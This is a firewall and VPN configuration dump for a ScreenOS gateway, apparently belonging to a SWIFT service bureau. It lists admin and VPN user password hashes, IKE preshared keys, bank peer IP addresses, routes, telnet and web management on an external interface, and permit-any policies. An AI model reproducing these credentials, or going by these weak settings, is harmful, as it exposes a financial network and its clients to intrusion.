+set vpn "VPN_UNILPKKA_DRCP_ISDN" gateway "GW_UNILPKKA_DRCP_ISDN" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_UNILPKKA_DRCP_ISDN" monitor optimized rekey
+set vpn "VPN_UNILPKKA_DRCP_ISDN" id 83 bind interface tunnel.2
+set vpn "VPN_MEZNPKKA_DR_LL" gateway "GW_MEZNPKKA_DR_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_MEZNPKKA_DR_LL" monitor optimized rekey
+set vpn "VPN_MEZNPKKA_DR_LL" id 85 bind interface tunnel.1
+set vpn "VP_NIBPPKKA_LL2" gateway "GW_NIBPPKKA_LL2" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VP_NIBPPKKA_LL2" monitor optimized rekey
+set vpn "VP_NIBPPKKA_LL2" id 87 bind interface tunnel.2
+set vpn "VPN_NIBPPKKA_DRCP_LL" gateway "GW_NIBPPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_NIBPPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_NIBPPKKA_DRCP_LL" id 89 bind interface tunnel.1
+set vpn "VPN_ENSBNOC_LL" gateway "GW_ENSBNOC_LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "VPN_ENSBNOC_LL" monitor optimized rekey
+set vpn "VPN_ENSBNOC_LL" id 93 bind interface tunnel.5
+set vpn "VPN_SAUDPKKA_GWCP_LL" gateway "GW_SAUDPKKA_GWCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SAUDPKKA_GWCP_LL" monitor optimized rekey
+set vpn "VPN_SAUDPKKA_GWCP_LL" id 94 bind interface tunnel.1
+set vpn "VPN_SAUDPKKA_DRCP_LL" gateway "GW_SAUDPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SAUDPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_SAUDPKKA_DRCP_LL" id 95 bind interface tunnel.1
+set vpn "VPN_SAUDPKKA_ISDN" gateway "GW_SAUDPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SAUDPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_SAUDPKKA_ISDN" id 96 bind interface tunnel.2
+set vpn "VPN_BKIPPKKA_DRCP_LL" gateway "GW_BKIPPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BKIPPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_BKIPPKKA_DRCP_LL" id 98 bind interface tunnel.1
+set vpn "VPN_BURJPKKA_ISDN" gateway "GW_BURJPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BURJPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_BURJPKKA_ISDN" id 100 bind interface tunnel.2
+set vpn "VPN_BURJPKKA_DRCP_LL" gateway "GW_BURJPKKA_DRCP_LL" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BURJPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_BURJPKKA_DRCP_LL" id 108 bind interface tunnel.1
+set vpn "VPN_DUIBPKKA_DRCP_LL" gateway "GW_DUIBPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_DUIBPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_DUIBPKKA_DRCP_LL" id 112 bind interface tunnel.1
+set vpn "VPN_DUIBPKKA_DRCP_ISDN" gateway "GW_DUIBPKKA_DRCP_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_DUIBPKKA_DRCP_ISDN" monitor optimized rekey
+set vpn "VPN_DUIBPKKA_DRCP_ISDN" id 113 bind interface tunnel.2
+set nsrp cluster id 1
+set nsrp rto-mirror sync
+set nsrp rto-mirror session ageout-ack
+set nsrp rto-mirror session non-vsi
+set nsrp vsd-group id 0 priority 100
+set nsrp vsd-group id 0 preempt
+set nsrp vsd-group id 0 monitor interface ethernet0/0
+set nsrp vsd-group id 0 monitor interface ethernet0/2
+set url protocol websense
+exit
+set policy id 13 from "Untrust" to "Trust"  "Dial-Up VPN" "NW_ENSBPK" "ANY" tunnel vpn "VPN_EN _SUPPORT_DIALIN" id 72 pair-policy 12 log 
+set policy id 13
+set log session-init
+exit
+set policy id 12 from "Trust" to "Untrust"  "NW_ENSBPK" "Dial-Up VPN" "ANY" tunnel vpn "VPN_EN _SUPPORT_DIALIN" id 72 pair-policy 13 log 
+set policy id 12
+set log session-init
+exit
+set policy id 11 from "Trust" to "Untrust"  "NW_ENSBPK" "Dial-Up VPN" "ANY" tunnel vpn "VPN_ENSB_MGMT_DIALIN" id 62 pair-policy 10 log 
+set policy id 11
+set log session-init
+exit
+set policy id 10 from "Untrust" to "Trust"  "Dial-Up VPN" "NW_ENSBPK" "ANY" tunnel vpn "VPN_ENSB_MGMT_DIALIN" id 62 pair-policy 11 log 
+set policy id 10
+set log session-init
+exit
+set policy id 9 from "Untrust" to "Trust"  "NW_ENSBPK_CUST_GWCP" "ENSBPK_SAG1" "EN_SAG_Service" permit log 
+set policy id 9
+set dst-address "ENSBPK_SAG2"
+exit
+set policy id 16 from "Untrust" to "Trust"  "NW_ENSBPK_CUST_DRCP" "ENSBPK_SAG1" "EN_SAG_Service" permit log 
+set policy id 16
+set dst-address "ENSBPK_SAG2"
+set log session-init
+exit
+set policy id 15 from "Untrust" to "Trust"  "NW_ENSBPK_CUST_DRCP" "ENSBPK_SWP1" "HTTPS" permit log 
+set policy id 15
+set src-address "NW_ENSBPK_CUST_GWCP"
+set service "ICMP-ANY"
+set service "SWP_TCP48600"
+set log session-init
+exit
+set policy id 7 from "Untrust" to "Untrust"  "Any" "NW_ENSBDXB" "EN_SAG_Service" permit log 
+set policy id 7
+exit
+set policy id 2 from "Trust" to "Untrust"  "Any" "Any" "ANY" permit log 
+set policy id 2
+exit
+set policy id 6 from "Trust" to "Untrust"  "Any" "NW_ENSBDXB" "EN_SAG_Service" permit log 
+set policy id 6 disable
+set policy id 6
+exit
+set policy id 8 from "Trust" to "Untrust"  "Any" "NW_ENSBDXB" "ANY" deny log 
+set policy id 8 disable
+set policy id 8
+exit
+set policy id 5 from "Untrust" to "Trust"  "NWG_DXB_MGMT" "Any" "ANY" permit log 
+set policy id 5
+exit
+set policy id 14 from "Untrust" to "Trust"  "NW_NOC" "NW_ENSBPK" "ANY" permit log 
+set policy id 14
+exit
+set policy id 4 from "Untrust" to "Global"  "Any" "Any" "ANY" permit log 
+set policy id 4
+exit
+set policy id 1 from "Untrust" to "Untrust"  "Any" "Any" "ANY" permit log 
+set policy id 1
+exit
+set policy id 3 from "Untrust" to "Trust"  "Any" "Any" "ANY" permit log 
+set policy id 3 disable
+set policy id 3
+exit
+set nsmgmt bulkcli reboot-timeout 60
+set ssh version v2
+set ssh enable
+set config lock timeout 5
+set ssl port 2443
+set snmp port listen 161
+set snmp port trap 162
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset add-default-route
+set route 0.0.0.0/0 interface ethernet0/2 gateway 202.63.216.17
+set route 10.82.0.0/16 interface ethernet0/0 gateway 192.168.246.9 preference 20 permanent
+set route 192.168.207.0/24 interface ethernet0/1 gateway 192.168.247.1 preference 20 permanent
+set route 10.95.115.0/24 interface ethernet0/1 gateway 192.168.247.1 preference 20
+set route 172.22.0.0/28 interface tunnel.1 gateway 10.10.0.200 preference 20
+set route 172.22.0.0/28 interface tunnel.2 gateway 10.20.0.200 preference 20 metric 10
+set route 192.168.206.0/24 interface tunnel.3 gateway 10.30.0.10 preference 20
+set route 192.168.206.0/24 interface tunnel.4 gateway 10.30.0.139 preference 20 metric 10
+set route 172.22.0.64/26 interface tunnel.1 gateway 10.10.0.100 preference 20
+set route 172.22.0.64/26 interface tunnel.2 gateway 10.20.0.100 preference 20 metric 10
+set route 172.22.0.128/26 interface tunnel.1 gateway 10.10.0.105 preference 20
+set route 172.22.0.128/26 interface tunnel.2 gateway 10.20.0.105 preference 20 metric 10
+set route 172.22.0.192/26 interface tunnel.1 gateway 10.10.0.110 preference 20
+set route 172.22.0.192/26 interface tunnel.2 gateway 10.20.0.110 preference 20 metric 10
+set route 172.22.1.192/26 interface tunnel.1 gateway 10.10.0.130 preference 20
+set route 172.22.1.192/26 interface tunnel.2 gateway 10.20.0.130 preference 20 metric 10
+set route 172.22.1.128/26 interface tunnel.1 gateway 10.10.0.125 preference 20
+set route 172.22.1.128/26 interface tunnel.2 gateway 10.20.0.125 preference 20 metric 10
+set route 172.22.1.64/26 interface tunnel.1 gateway 10.10.0.120 preference 20
+set route 172.22.1.64/26 interface tunnel.2 gateway 10.20.0.120 preference 20 metric 10
+set route 172.22.1.0/26 interface tunnel.1 gateway 10.10.0.115 preference 20
+set route 172.22.1.0/26 interface tunnel.2 gateway 10.20.0.115 preference 20 metric 10
+set route 172.22.2.64/26 interface tunnel.1 gateway 10.10.0.140 preference 20
+set route 172.22.2.64/26 interface tunnel.2 gateway 10.20.0.140 preference 20 metric 10
+set route 172.22.2.192/26 interface tunnel.1 gateway 10.10.0.150 preference 20
+set route 172.22.2.192/26 interface tunnel.2 gateway 10.20.0.150 preference 20 metric 10
+set route 172.22.2.128/26 interface tunnel.1 gateway 10.10.0.145 preference 20
+set route 172.22.2.128/26 interface tunnel.2 gateway 10.20.0.145 preference 20 metric 10
+set route 172.22.3.64/26 interface tunnel.1 gateway 10.10.0.160 preference 20
+set route 172.22.2.0/26 interface tunnel.1 gateway 10.10.0.135 preference 20
+set route 172.22.3.0/26 interface tunnel.1 gateway 10.10.0.155 preference 20
+set route 172.22.3.128/26 interface tunnel.1 gateway 10.10.0.170 preference 20
+set route 172.22.4.64/26 interface tunnel.1 gateway 10.10.0.175 preference 20
+set route 172.22.5.0/26 interface tunnel.1 gateway 10.10.0.185 preference 20
+set route 172.22.5.0/26 interface tunnel.2 gateway 10.20.0.185 preference 20 metric 10
+set route 172.22.4.64/26 interface tunnel.2 gateway 10.20.0.175 preference 20 metric 10
+set route 172.22.3.128/26 interface tunnel.2 gateway 10.20.0.170 preference 20 metric 10
+set route 172.22.3.192/26 interface tunnel.1 gateway 10.10.0.165
+set route 172.22.3.192/26 interface tunnel.2 gateway 10.20.0.165 metric 10 permanent
+set route 172.22.4.128/26 interface tunnel.1 gateway 10.10.0.180 preference 20
+set route 172.22.4.128/26 interface tunnel.2 gateway 10.20.0.180 preference 20 metric 10
+set route 172.22.5.64/26 interface tunnel.1 gateway 10.10.0.195 preference 20
+set route 172.22.5.128/26 interface tunnel.1 gateway 10.10.0.200 preference 20
+set route 192.168.196.0/24 interface tunnel.5 gateway 10.40.0.20 preference 20
+set route 172.22.6.0/26 interface tunnel.1 gateway 10.10.0.210 preference 20
+set route 172.22.7.0/26 interface tunnel.1 gateway 10.10.0.235 preference 20
+set route 172.22.7.0/26 interface tunnel.2 gateway 10.20.0.235 preference 20 metric 20
+exit
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+exit

swift/00566_1_ENSBPVPN2.txt

@@ -0,0 +1,555 @@
+set clock dst-off
+set clock timezone 5
+set vrouter trust-vr sharable
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset auto-route-export
+exit
+set service "EN_SAG_FIN" protocol tcp src-port 0-65535 dst-port 48002-48002 
+set service "EN_SAG_FAct" protocol tcp src-port 0-65535 dst-port 48003-48003 
+set service "SWP_TCP48600" protocol tcp src-port 0-65535 dst-port 48600-48600 
+set auth-server "Local" id 0
+set auth-server "Local" server-name "Local"
+set auth-server "RSA_Server" id 1
+set auth-server "RSA_Server" server-name "192.168.206.100"
+set auth-server "RSA_Server" account-type auth xauth 
+set auth-server "RSA_Server" type securid
+set auth default auth server "Local"
+set auth radius accounting port 27911
+set admin name "ENSBadmin"
+set admin password "nBd5PIrLLusBciHPhs0PBnMtk5Dm5n"
+set admin user "juy" password "nG5aE+reBeQIcQYK4sPHRuHtGdG0Kn" privilege "all"
+set admin user "adesear" password "nLtbNIrRDSPEcrMDFs7MT5Htz8Cifn" privilege "all"
+set admin user "msaeed" password "nF3dKrrkHDHCckxALsfARkBtenLoAn" privilege "all"
+set admin user "kbaluyot" password "nMSQP4rHLyxHcWqBmsqP9pMtnMGPYn" privilege "all"
+set admin ssh port 2194
+set admin auth timeout 10
+set admin auth server "Local"
+set admin auth banner telnet login "EastNets Service Bureau: AUTHORIZED PERSON ONLY! "
+set admin auth banner console login "EastNets Service Bureau: AUTHORIZED PERSON ONLY! "
+set admin format dos
+set zone "Trust" vrouter "trust-vr"
+set zone "Untrust" vrouter "trust-vr"
+set zone "DMZ" vrouter "trust-vr"
+set zone "VLAN" vrouter "trust-vr"
+set zone "Untrust-Tun" vrouter "trust-vr"
+set zone "Trust" tcp-rst 
+set zone "Untrust" block 
+unset zone "Untrust" tcp-rst 
+set zone "MGT" block 
+set zone "DMZ" tcp-rst 
+set zone "VLAN" block 
+set zone "VLAN" tcp-rst 
+set zone "Untrust" screen icmp-flood
+set zone "Untrust" screen udp-flood
+set zone "Untrust" screen port-scan
+set zone "Untrust" screen ip-sweep
+set zone "Untrust" screen tear-drop
+set zone "Untrust" screen syn-flood
+set zone "Untrust" screen ip-spoofing
+set zone "Untrust" screen ping-death
+set zone "Untrust" screen ip-filter-src
+set zone "Untrust" screen land
+set zone "Untrust" screen syn-frag
+set zone "Untrust" screen tcp-no-flag
+set zone "Untrust" screen ip-bad-option
+set zone "Untrust" screen icmp-fragment
+set zone "Untrust" screen syn-fin
+set zone "Untrust" screen fin-no-ack
+set zone "Untrust" screen syn-ack-ack-proxy
+set zone "V1-Untrust" screen tear-drop
+set zone "V1-Untrust" screen syn-flood
+set zone "V1-Untrust" screen ping-death
+set zone "V1-Untrust" screen ip-filter-src
+set zone "V1-Untrust" screen land
+set interface "ethernet0/0" zone "Trust"
+set interface "ethernet0/1" zone "Untrust"
+set interface "ethernet0/2" zone "Untrust"
+set interface "tunnel.1" zone "Untrust"
+set interface "tunnel.2" zone "Untrust"
+set interface "tunnel.3" zone "Untrust"
+set interface "tunnel.4" zone "Untrust"
+set interface "tunnel.5" zone "Untrust"
+unset interface vlan1 ip
+set interface ethernet0/0 ip 192.168.246.7/24
+set interface ethernet0/0 nat
+set interface ethernet0/1 ip 192.168.247.7/24
+set interface ethernet0/1 route
+set interface ethernet0/2 ip 202.63.216.20/28
+set interface ethernet0/2 route
+set interface tunnel.1 ip 10.10.0.1/16
+set interface tunnel.2 ip 10.20.0.1/16
+set interface tunnel.3 ip 10.30.0.1/25
+set interface tunnel.4 ip 10.30.0.129/25
+set interface tunnel.5 ip 10.40.0.50/16
+unset interface vlan1 bypass-others-ipsec
+unset interface vlan1 bypass-non-ip
+set interface ethernet0/0 manage-ip 192.168.246.6
+set interface ethernet0/1 manage-ip 192.168.247.6
+set interface ethernet0/2 manage-ip 202.63.216.19
+set interface ethernet0/0 ip manageable
+set interface ethernet0/1 ip manageable
+unset interface ethernet0/2 ip manageable
+set interface ethernet0/1 manage ping
+set interface ethernet0/1 manage ssh
+set interface ethernet0/1 manage telnet
+set interface ethernet0/1 manage snmp
+set interface ethernet0/1 manage ssl
+set interface ethernet0/1 manage web
+set interface ethernet0/1 manage ident-reset
+set interface ethernet0/2 manage ping
+set interface ethernet0/2 manage ssh
+set interface ethernet0/2 manage telnet
+set interface ethernet0/2 manage snmp
+set interface ethernet0/2 manage ssl
+set interface ethernet0/2 manage web
+set interface ethernet0/2 manage ident-reset
+set auth-server "RSA_Server" src-interface "ethernet0/0"
+unset flow no-tcp-seq-check
+set flow tcp-syn-check
+set hostname ENSBPVPN2
+set pki authority default scep mode "auto"
+set pki x509 default cert-path partial
+set dns host dns1 202.63.197.6
+set dns host dns2 202.63.192.12
+set dns host dns3 0.0.0.0
+set address "Trust" "192.168.246.0/24" 192.168.246.0 255.255.255.0
+set address "Trust" "ENSBPK_SAG1" 192.168.246.25 255.255.255.255
+set address "Trust" "ENSBPK_SAG2" 192.168.246.20 255.255.255.255
+set address "Trust" "ENSBPK_SWP1" 192.168.246.30 255.255.255.255
+set address "Trust" "NW_ENSBPK" 192.168.246.0 255.255.255.0
+set address "Untrust" "NW_ENDXB_HQ" 213.132.40.96 255.255.255.240
+set address "Untrust" "NW_ENSBDXB" 192.168.206.0 255.255.255.0
+set address "Untrust" "NW_ENSBDXB_Public" 213.132.51.16 255.255.255.240
+set address "Untrust" "NW_ENSBPK_CUST_DRCP" 172.23.0.0 255.255.0.0 "DRCP Client GNAT"
+set address "Untrust" "NW_ENSBPK_CUST_GWCP" 172.22.0.0 255.255.0.0 "GWCP Client GNAT"
+set address "Untrust" "NW_NOC" 192.168.196.0 255.255.255.0
+set group address "Untrust" "NWG_DXB_MGMT" comment "Allowd IP's to manage PK"
+set group address "Untrust" "NWG_DXB_MGMT" add "NW_ENDXB_HQ"
+set group address "Untrust" "NWG_DXB_MGMT" add "NW_ENSBDXB"
+set group address "Untrust" "NWG_DXB_MGMT" add "NW_ENSBDXB_Public"
+set group service "EN_SAG_Ports" comment "SAG Ports"
+set group service "EN_SAG_Ports" add "EN_SAG_FAct"
+set group service "EN_SAG_Ports" add "EN_SAG_FIN"
+set group service "EN_SAG_Service" comment "SAG Service"
+set group service "EN_SAG_Service" add "EN_SAG_FAct"
+set group service "EN_SAG_Service" add "EN_SAG_FIN"
+set group service "EN_SAG_Service" add "ICMP-ANY"
+set ippool "Default_Pool" 10.100.0.1 10.100.0.254
+set user "adesear" uid 12
+set user "adesear" ike-id u-fqdn "adesear@eastnets.com" share-limit 1
+set user "adesear" type  ike xauth
+set user "adesear" password "XvqGprsONg+hTMsZJ9CW55GB2znBRVO8tw=="
+unset user "adesear" type auth
+set user "adesear" "enable"
+set user "hkhan" uid 13
+set user "hkhan" ike-id u-fqdn "hkhan@eastnets.com" share-limit 1
+set user "hkhan" type  ike xauth
+set user "hkhan" password "y52jzNaSNADQmksdZzCiXQqdHEn59T/IQg=="
+unset user "hkhan" type auth
+set user "hkhan" "enable"
+set user "juy" uid 8
+set user "juy" ike-id u-fqdn "juy@eastnets.com" share-limit 1
+set user "juy" type  ike xauth
+set user "juy" password "A1DtwtZJN8cigbs+FBCgkt6tYJnqxG/uTw=="
+unset user "juy" type auth
+set user "juy" "enable"
+set user "mfarid" uid 4
+set user "mfarid" ike-id u-fqdn "mfarid@eastnets.com" share-limit 1
+set user "mfarid" type  ike xauth
+set user "mfarid" password "RqCPQYYTNcnqTps9NMC6JE5Zlrnvz6Htgg=="
+unset user "mfarid" type auth
+set user "mfarid" "enable"
+set user "test" uid 2
+set user "test" ike-id u-fqdn "test@test.test" share-limit 1
+set user "test" type  ike
+set user "test" "enable"
+set user "tmp" uid 3
+set user "tmp" ike-id u-fqdn "tmp@tmp.tmp" share-limit 1
+set user "tmp" type  ike
+set user "tmp" "enable"
+set user-group "Dialup_gourp" id 2
+set user-group "Dialup_gourp" location external
+set user-group "Dialup_gourp" type xauth 
+set user-group "ENSB_Support_Group" id 3
+set user-group "ENSB_Support_Group" user "hkhan"
+set user-group "ensb_mgmt_group" id 1
+set user-group "ensb_mgmt_group" user "adesear"
+set user-group "ensb_mgmt_group" user "juy"
+set user-group "ensb_mgmt_group" user "mfarid"
+set ike gateway "GW_DXB" address 91.75.72.5 Main outgoing-interface "ethernet0/2" preshare "V/1Z77I7N5UuF0siYAC8t0qvN3nIG3TpOM2aUMK1gnY0ZXCKcHdu9vc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_DXB_ISDN" address 192.168.207.17 Main outgoing-interface "ethernet0/1" preshare "uapaaalhNHK3ngs3PlCSC/if8vnij5ZeUuInMqA/Q6e5sNDDfcieZBc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_DXB_ISDN" cert peer-ca all
+set ike gateway  "GW_DXB_ISDN" nat-traversal
+set ike gateway "GW_DXB_ISDN" nat-traversal udp-checksum
+set ike gateway "GW_DXB_ISDN" nat-traversal keepalive-frequency 0
+set ike gateway "GW_N_DXB_OFC" address 0.0.0.0 id "PTSAAEAA@eastnets.com" Main outgoing-interface "ethernet0/2" preshare "YBVGBJw3NKol2esLEYC5HijvjjnQq+PhyN4QjSzkzrq7YoYIc8np1Ww=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_N_DXB_OFC" nat-traversal
+set ike gateway "GW_N_DXB_OFC_ISDN" address 0.0.0.0 id "PTSAAEAA@eastnets.com" Main outgoing-interface "ethernet0/1" preshare "r6I0IL5jNxajTusmZECN/pK8g7nDUtY+LKnE0jtvuvCgwurASaOEG9o=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_N_DXB_OFC_ISDN" nat-traversal
+set ike gateway "GW_KHYPPKKA_LL" address 210.2.139.34 Main outgoing-interface "ethernet0/2" preshare "zb5eZTZPN27GGzsdtFC17JsSSFnsON8afeaugtY4iyqv5I+xRB2K2MA=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_KHYBPKKA_ISDN" address 0.0.0.0 id "KHYBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "2m7ZKSCTNrj0NJsR1QC11uXfJSnjHJW4bmL0BG7aLa+Blw0diYRgCrY=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_KHYBPKKA_ISDN" nat-traversal
+set ike gateway "GW_AIINPKKA_LL" address 203.130.2.203 Main outgoing-interface "ethernet0/2" preshare "z3B00C33NE0YPpsL/sCykO/QnRnS5mnFYLjFggS9oWOkEIMfLiIp5+Q=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_AIINPKKA_ISDN" address 0.0.0.0 id "AIINPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "Ie3HOgDLNxOdj9sBMKCMWvW45AnZwshQ1CqGA5Cc4WUZI/vYiLO6/HY=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_AIINPKKA_ISDN" nat-traversal
+set ike gateway "GW_BKIPPKKA_LL" address 210.2.139.58 Main outgoing-interface "ethernet0/2" preshare "E3dkZGJtNRBmWos4f4CFosHVRInyixhy/NoPR2nklBWoR9eEoBZzquU=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_BKIPPKKA_ISDN" address 0.0.0.0 id "BKIPPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "ny0c4WPpNff6DJsctBCN3ob282nRBbsFRMOj2SwuOTiQQoF6J6mMOOw=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_BKIPPKKA_ISDN" nat-traversal
+set ike gateway "GW_PLCOPKKA_LL" address 202.44.85.229 Main outgoing-interface "ethernet0/2" preshare "0nKQ0Z1NN+bWI+svF8CnEgF5xdn0611xt5b/CekuByxayTCG6Sto7pQ=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_PLCOPKKA_ISDN" address 0.0.0.0 id "PLCOPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "xKM49ZOFN5KHLOssMtCJSPaYsKnYORUtPRQa/y1f9cq71biXBzfW86o=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_PLCOPKKA_ISDN" nat-traversal
+set ike gateway "GW_DBHDPKKA_LL" address 203.101.171.34 Main outgoing-interface "ethernet0/2" preshare "MVaw2FfuNk9UDssjjoCZ/yxVUVnC8+giae46pWsVXpAqc0Y5xKw7ugk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_DBHDPKKA_ISDN" address 0.0.0.0 id "DBHDPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "nDJrR4lPNhDWeKs27XCDCQLjrTn4v83uOrtwDJ5FjEvBRhij957Gofc=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_DBHDPKKA_ISDN" nat-traversal
+set ike gateway "GW_FDIBPKKA_LL" address 202.88.39.45 Main outgoing-interface "ethernet0/2" preshare "AcZQCuChNskTWcsguwC3/nRygLnIhTSAP3EkDbIMZAbDw5tOLpheiI8=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_FDIBPKKA_ISDN" address 0.0.0.0 id "FDIBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "H7TKN6SwNXsQpesI6hCVwZYAKen9/qW366kbqV7jeBeOP5ftNg3opoM=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_FDIBPKKA_ISDN" nat-traversal
+set ike gateway "GW_FAYSPKKA_LL" address 125.209.98.178 Main outgoing-interface "ethernet0/2" preshare "26ly5qEUNDbqQxstO2CXkSY7oPn4UQtH7HweA2RIlf3RJ3T27KQY+2s=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_FAYSPKKA_ISDN" address 0.0.0.0 id "FAYSPKKA@eastnets.com" Main outgoing-interface "ethernet0/1" preshare "hUeevc84N6ZN1Psg8wCLeldeYJnZ71Gzf1ujvfePBgPc1c/6KAukOeU=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_FAYSPKKA_ISDN" nat-traversal
+set ike gateway "GW_NIBPPKKA_LL" address 124.29.205.107 Main outgoing-interface "ethernet0/2" preshare "Ufd51GQnNj5X/VsVQ6CxEvMwzTnDEUBT3OrVfHFpciGNGJ5l8X4eKYU=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_NIBPPKKA_ISDN" address 0.0.0.0 id "NIBPPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "FvEj8dxGNPhZrvsb1iCkP8t64InsHjuGnICseq5BtJLk8iv2cDN3Aic=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_NIBPPKKA_ISDN" nat-traversal
+set ike gateway "GW_MEZNPKKA_LL" address 125.209.91.19 Main outgoing-interface "ethernet0/2" preshare "nTJ5Ws32NKjP2PsaPmCYE4jd0NnSYd/sUZt7Y0FMhzyLEvgWN5o9jpw=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_MEZNPKKA_ISDN" address 0.0.0.0 id "MEZNPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "5ItAdPm1Ncbk9wsUiiCIuBv9zbn+Y3R26/pSAooNpt6oU4qstPPFuxc=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_MEZNPKKA_ISDN" nat-traversal
+set ike gateway "GW_FWOMPKKA_LL" address 124.29.205.6 Main outgoing-interface "ethernet0/2" preshare "/rWK7/JqNJz/ZqsbxwCcEcB0vOnIQlF3CqIJa1rm87jtnRVrXe5gmAk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_FWOMPKKA_ISDN" address 0.0.0.0 id "FWOMPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "5k7i8H3oN9laQds+pTCauj7d+8nldFPrXtUDxtymthOYwFIvhjT2eAs=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_FWOMPKKA_ISDN" nat-traversal
+set ike gateway "GW_FAYSPKKA_DR_LL" address 58.27.253.14 Main outgoing-interface "ethernet0/2" preshare "ciBpuwT3N2nMnOslkuCOvbIdTSnUPK54613xhmkj4R+i6xxyZik/WFk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSB_MGMT_DIALIN" dialup "ensb_mgmt_group" Aggr outgoing-interface "ethernet0/2" preshare "5o8dLMTFNwbcJGsb8mCw/t0ahvne5vnyaOneXZOwMX867LnDty5GOuA=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSB_MGMT_DIALIN" nat-traversal udp-checksum
+set ike gateway "GW_ENSB_MGMT_DIALIN" nat-traversal keepalive-frequency 5
+set ike gateway "GW_ENSB_MGMT_DIALIN" xauth
+set ike gateway "GW_ENSB_MGMT_DIALIN" xauth server auth-method chap pap
+unset ike gateway "GW_ENSB_MGMT_DIALIN" xauth do-edipi-auth
+set ike gateway "GW_BAHLPKKA_GWCP_LL" address 202.125.136.108 Main outgoing-interface "ethernet0/2" preshare "CTFR32fJNvBReCs8duCDevf4nxnMNB8qAGeRoXMwMhjQCxZBWjZlXnU=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_BAHLPKKA_DRCP_LL" address 117.20.16.142 Main outgoing-interface "ethernet0/2" preshare "X8VeSI+PNwYXwlsR4QCDqUG0knnwnKx3krqF/FbZcwW2kmR/doAfZQg=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_EGIBPKKA_DRCP_LL" address 124.29.243.58 Main outgoing-interface "ethernet0/2" preshare "Ngzaj90JNQQZLws9CYCR7E+gPsnFWqinCgXYgZ0NJ3kXox6fDxCxtpc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_EGIBPKKA_LL" address 124.29.243.218 Main outgoing-interface "ethernet0/2" preshare "clR444+FNgOXE9soBsCTdswH4Fnc1I23+zCsqO/WLkMf7GsrC+XIzbA=" proposal "pre-g2-3des-md5"
+set ike gateway "GW__ISDN" address 0.0.0.0 id "EGIBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "VIYB64K2NIgGYrsUC8Cno8rIM1n+Sx7ewGCWfCSqe2L7pr4ZaJY26qY=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW__ISDN" nat-traversal
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" dialup "ENSB_Support_Group" Aggr outgoing-interface "ethernet0/2" preshare "Ie1uh/pMNDkMB0szXACl4EHJYRnrCDflU6uWeStlmoh1FyY01tfgdZ4=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" nat-traversal udp-checksum
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" nat-traversal keepalive-frequency 5
